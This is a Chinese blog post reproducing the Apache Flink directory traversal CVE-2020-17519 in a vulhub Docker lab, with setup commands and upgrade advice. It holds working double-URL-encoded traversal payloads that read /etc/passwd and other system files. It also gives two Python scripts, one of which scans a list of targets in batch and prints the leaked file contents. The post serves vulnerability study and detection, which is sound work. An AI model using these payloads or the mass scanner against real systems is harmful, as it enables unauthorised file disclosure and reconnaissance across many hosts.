[ vulhub漏洞复现篇 ] Apache Flink目录遍历(CVE-2020-17519)
博主介绍
博主介绍:大家好,我是 _PowerShell ,很高兴认识大家~
✨主攻领域:【渗透领域】【数据通信】 【通讯安全】 【web安全】【面试分析】
点赞➕评论➕收藏 == 养成习惯(一键三连)
欢迎关注一起学习一起讨论⭐️一起进步文末有彩蛋
作者水平有限,欢迎各位大佬指点,相互学习进步!
文章目录
- 博主介绍
- 一、漏洞编号
- 二、漏洞描述
- 三、影响范围
- 四、环境搭建
-
- 1、切换到CVE-2020-17519目录
- 2、启动CVE-2020-17519环境
- 3、查看CVE-2020-17519环境
- 4、访问CVE-2020-17519环境
- 5、查看CVE-2020-17519提示信息
- 6、关闭CVE-2020-17519环境
- 五、漏洞复现
-
- 1、读取/etc/passwd文件
-
- 1.构造Poc
- 2.复现读取/etc/passwd文件
- 2、读取/etc/rc0.d/K01hwclock.sh文件
-
- 1.构造POC
- 2.复现读取/etc/rc0.d/K01hwclock.sh
- 六、检测工具
-
- 1、单目标检测脚本
-
- 1.脚本
- 2、批量检测脚本
-
- 1.脚本
- 2.参数介绍
- 3.使用介绍
- 七漏洞修复
- 八相关资源
一、漏洞编号
CVE-2020-17519
二、漏洞描述
2021年1月5日,Apache Flink官方发布安全更新,修复了由蚂蚁安全非攻实验室发现提交的2个高危漏洞,漏洞之一就是Apache Flink目录遍历漏洞(CVE-2020-17519)。 Flink核心是一个流式的数据流执行引擎,其针对数据流的分布式计算提供了数据分布、数据通信以及容错机制等功能。Flink 1.5.1引入了REST API,但其实现上存在多处缺陷,攻击者可通过REST API使用…/跳目录实现系统任意文件读取。
三、影响范围
Apache Flink 1.5.1 ~ 1.11.2
四、环境搭建
采用vulhub环境
1、切换到CVE-2020-17519目录
cd vulhub/flink/CVE-2020-17519
2、启动CVE-2020-17519环境
docker-compose up -d
![[ vulhub漏洞复现篇 ] Apache Flink目录遍历(CVE-2020-17519)_第1张图片](http://img.e-com-net.com/image/info8/d1efdc8bb8ae4de7a3e8b164b3377e68.jpg)
3、查看CVE-2020-17519环境
docker-compose ps
![[ vulhub漏洞复现篇 ] Apache Flink目录遍历(CVE-2020-17519)_第2张图片](http://img.e-com-net.com/image/info8/5e76af0350024f1e92fb7f9c8c4f4b79.jpg)
4、访问CVE-2020-17519环境
http://ip:8081
![[ vulhub漏洞复现篇 ] Apache Flink目录遍历(CVE-2020-17519)_第3张图片](http://img.e-com-net.com/image/info8/324991100ca34d578f840bdda9c6a1a5.jpg)
5、查看CVE-2020-17519提示信息
cat README.md
![[ vulhub漏洞复现篇 ] Apache Flink目录遍历(CVE-2020-17519)_第4张图片](http://img.e-com-net.com/image/info8/aadd2b881fc84d899d5403bd941c0ba9.jpg)
6、关闭CVE-2020-17519环境
复现完毕记得关闭环境
docker-compose down
五、漏洞复现
1、读取/etc/passwd文件
1.构造Poc
../../../../../../../../../../../../etc/passwd
两次url编码得到POC
/jobmanager/logs/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc%252fpasswd
在线url编码器
https://www.iamwawa.cn/urldecode.html
![[ vulhub漏洞复现篇 ] Apache Flink目录遍历(CVE-2020-17519)_第5张图片](http://img.e-com-net.com/image/info8/a5a27708922843159f271f7929ec516c.jpg)
2.复现读取/etc/passwd文件
http://192.168.13.131:8081/jobmanager/logs/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc%252fpasswd
![[ vulhub漏洞复现篇 ] Apache Flink目录遍历(CVE-2020-17519)_第6张图片](http://img.e-com-net.com/image/info8/18d052b2936446ec821916dee63267b3.jpg)
2、读取/etc/rc0.d/K01hwclock.sh文件
1.构造POC
../../../../../../../../../../../../etc/rc0.d/K01hwclock.sh
两次url编码得到POC
/jobmanager/logs/..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252Fetc%252Frc0.d%252FK01hwclock.sh
在线url编码器
https://www.iamwawa.cn/urldecode.html
![[ vulhub漏洞复现篇 ] Apache Flink目录遍历(CVE-2020-17519)_第7张图片](http://img.e-com-net.com/image/info8/da734c6d1cd34d88900904f80c34d5dd.jpg)
2.复现读取/etc/rc0.d/K01hwclock.sh
http://192.168.13.131:8081/jobmanager/logs/..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252Fetc%252Frc0.d%252FK01hwclock.sh
![[ vulhub漏洞复现篇 ] Apache Flink目录遍历(CVE-2020-17519)_第8张图片](http://img.e-com-net.com/image/info8/0f98ec83f1114c098e918570d357c77a.jpg)
rc0 - rc6 各启动级别的启动脚本
![[ vulhub漏洞复现篇 ] Apache Flink目录遍历(CVE-2020-17519)_第9张图片](http://img.e-com-net.com/image/info8/8a3e7d01dc91473987064add7a8bd44a.jpg)
六、检测工具
1、单目标检测脚本
https://download.csdn.net/download/qq_51577576/86718693
1.脚本
import argparse
import requests
global headers
headers={'cookie': 'UM_distinctid=17333bd886662-037f6fda493dae-4c302372-100200-17333bd8867b; CNZZDATA1278305074=612386535-1594299183-null%7C1594299183; PHPSESSID=drh67vlau4chdn44eadh0m16a0',
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:78.0) Gecko/20100101 Firefox/78.0'}
class Apache_Flink():
def url(self):
parser = argparse.ArgumentParser(description='Apache Flink(CVE-2020-17519)路径遍历漏洞检测POC')
parser.add_argument('target_url',type=str,help='The target address,example: http://192.168.140.153:8090')
args = parser.parse_args()
global target_url
target_url = args.target_url
print("Apache Flink(CVE-2020-17519)路径遍历漏洞检测POC!!")
print("正在执行检测...")
print("目标地址:",target_url)
return target_url
def check(self):
poc = r"/jobmanager/logs/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc%252fpasswd"
url = target_url + poc
try:
re = requests.get(url,headers=headers,timeout=4)
if re.status_code==200 and "root:x" in re.text:
print('漏洞存在')
else:
print('漏洞不存在')
except:
print('访问异常')
if __name__ == '__main__':
flink = Apache_Flink()
flink.url()
flink.check()
```bash
### 2.使用介绍
```bash
python CVE-2020-17519.py http://192.168.13.131:8081
2、批量检测脚本
https://download.csdn.net/download/qq_51577576/86718662
1.脚本
import requests
import sys
import click
banner ='''\033[1;33;40m
_______ ________ ___ ___ ___ ___ __ ______ _____ __ ___
/ ____\ \ / / ____| |__ \ / _ \__ \ / _ \ /_ |____ | ____/_ |/ _ \
| | \ \ / /| |__ ______ ) | | | | ) | | | |______| | / /| |__ | | (_) |
| | \ \/ / | __|______/ /| | | |/ /| | | |______| | / / |___ \ | |\__, |
| |____ \ / | |____ / /_| |_| / /_| |_| | | | / / ___) || | / /
\_____| \/ |______| |____|\___/____|\___/ |_|/_/ |____/ |_| /_/
'''
header = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.99 Safari/537.36"}
def scan(target):
pyaload = "/jobmanager/logs/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc%252fpasswd"
poc = str(target) + pyaload
try:
requests.packages.urllib3.disable_warnings()
rep = requests.get(url=poc, headers=header, timeout=5, verify=False)
if rep.status_code ==200 and "root" in rep.text:
print(u'\033[1;31;40m[+]{} is apache flink directory traversal vulnerability'.format(target))
print(rep.text)
else:
print('\033[1;32;40m[-]{} None'.format(target))
except:
print("error")
def scan2(file):
pyaload = "/jobmanager/logs/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc%252fpasswd"
f = open(file, 'r')
for url in f.readlines():
poc = url.strip() + pyaload
try:
requests.packages.urllib3.disable_warnings()
rep = requests.get(url=poc, headers=header, timeout=10, verify=False)
if rep.status_code ==200 and "root" in rep.text:
print(u'\033[1;31;40m[+]{} 存在CVE-2020-17519-Apache-Flink任意文件读取漏洞'.format(url.strip()))
print(rep.text)
else:
print('\033[1;32;40m[-]{} None'.format(url.strip()))
print(rep.text)
except:
print("error")
f.close()
@click.command()
@click.option("-u", "--url", help='Target URL; Example:http://ip:port。')
@click.option("-f", "--file", help="Target File; Example:target.txt。")
def main(url, file):
print(banner)
if url != None and file == None:
scan(url)
elif file != None and url == None:
scan2(file)
else:
print("python3 CVE-2020-17519 --help")
if __name__ == "__main__":
main()
2.参数介绍
--help 查看使用帮助
-u 检测某个地址是否存在漏洞
-f 批量检测漏洞
3.使用介绍
python CVE-2020-17519.py --help
python CVE-2020-17519.py -u http://192.168.13.131:8081
![[ vulhub漏洞复现篇 ] Apache Flink目录遍历(CVE-2020-17519)_第10张图片](http://img.e-com-net.com/image/info8/515e598eaaef4c9a8efb042a5d54b860.jpg)
python CVE-2020-17519.py -f target.txt
![[ vulhub漏洞复现篇 ] Apache Flink目录遍历(CVE-2020-17519)_第11张图片](http://img.e-com-net.com/image/info8/389072f4faf34452b098194e1e7004a4.jpg)
大量目标检测的时候,将读取文件直接输出可能不太方便,可以自行修改脚本文件
如下,简单修改不输出读取文件
当然也可以将读取文件输出到文件内,都可自行修改
![[ vulhub漏洞复现篇 ] Apache Flink目录遍历(CVE-2020-17519)_第12张图片](http://img.e-com-net.com/image/info8/fb32909a95cb4e62aa347489d05954ac.jpg)
python CVE-2020-17519.py -f target.txt
七漏洞修复
所有用户升级到最新版本,下载链接为:
https://flink.apache.org/downloads.html
八相关资源
1.docker 搭建 vulhub 靶场环境
https://blog.csdn.net/qq_51577576/article/details/125048165
2.[ vulhub漏洞复现篇 ] Apache Flink 文件上传漏洞 (CVE-2020-17518)
https://blog.csdn.net/qq_51577576/article/details/126650988
3.Apache Flink目录遍历(CVE-2020-17519)单目标检测脚本
https://download.csdn.net/download/qq_51577576/86718693
4.Apache Flink目录遍历(CVE-2020-17519)批量检测脚本
https://download.csdn.net/download/qq_51577576/86718662
5.在线url编码器
https://www.iamwawa.cn/urldecode.html